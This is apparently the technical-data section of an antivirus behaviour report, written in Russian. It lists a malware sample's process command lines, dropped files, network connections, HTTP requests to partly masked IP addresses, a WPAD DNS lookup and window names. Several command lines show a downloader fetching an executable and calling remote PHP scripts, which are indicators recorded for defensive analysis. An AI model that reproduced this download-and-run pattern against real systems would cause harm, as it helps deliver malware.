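Техническая информация
Примечание: подзаголовки разделов в этом фрагменте не сохранились. Ниже по порядку идут командные строки запущенных процессов, пути к файлам (тип операции над файлом не указан, поэтому некоторые пути повторяются), сетевые адреса и HTTP-запросы, DNS-запрос и пары ClassName/WindowName окон. Символ «#» в IP-адресах, именах узлов и параметрах запросов, по-видимому, заменяет скрытые символы, поэтому эти значения нельзя использовать как точные индикаторы без сверки с исходным отчётом.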
- '<LS_APPDATA>\ddnow.exe' "http://16#.#22.193.33/run1.php?a=########" "a" "<LS_APPDATA>\run1.txt"
- '<LS_APPDATA>\ddnow.exe' "http://16#.#22.194.89/setup200.exe" ";Ok" "setupone74111615.exe"
- '<SYSTEM32>\ntvdm.exe' -f -i1
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 352
- '<LS_APPDATA>\ddnow.exe' "http://16#.#22.194.89/soid1.php?p=#############" "aa" "aatxtname.txt"
- '<LS_APPDATA>\tinstall.exe'
- '<LS_APPDATA>\ddnow.exe' "http://16#.#22.194.89/goet1.php?p=#####################" ";45uavf44qfx;0-$fire-ATSpywaregot--L$cgot-<Полный путь к файлу>;0" "47531236.txt"
- <LS_APPDATA>\run1.txt
- <LS_APPDATA>\aatxtname.txt
- <LS_APPDATA>\47531236.txt
- %WINDIR%\Temp\scs4.tmp
- %WINDIR%\Temp\scs3.tmp
- <LS_APPDATA>\setupone74111615.exe
- %TEMP%\1D089.dmp
- <LS_APPDATA>\tinstall.exe
- <LS_APPDATA>\ddnow4.exe
- <LS_APPDATA>\ddnow.exe
- %TEMP%\dw.log
- %TEMP%\nsy2.tmp\SimpleFC.dll
- <LS_APPDATA>\tinstall4.exe
- %WINDIR%\Temp\scs3.tmp
- %WINDIR%\Temp\scs4.tmp
- <LS_APPDATA>\47531236.txt
- <LS_APPDATA>\run1.txt
- <LS_APPDATA>\run1.txt
- '16#.#22.193.33':80
- '16#.#22.194.89':80
- 'wp#d':80
- http://11#.#11.111.1/wpad.dat via wp#d
- http://16#.#22.193.33/run1.php?a=########
- http://16#.#22.194.89/setup200.exe
- http://16#.#22.194.89/goet1.php?p=#####################
- http://16#.#22.194.89/soid1.php?p=#############
- DNS ASK wp#d
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-cf4.cfc.380001'
- ClassName: 'Shell_TrayWnd' WindowName: ''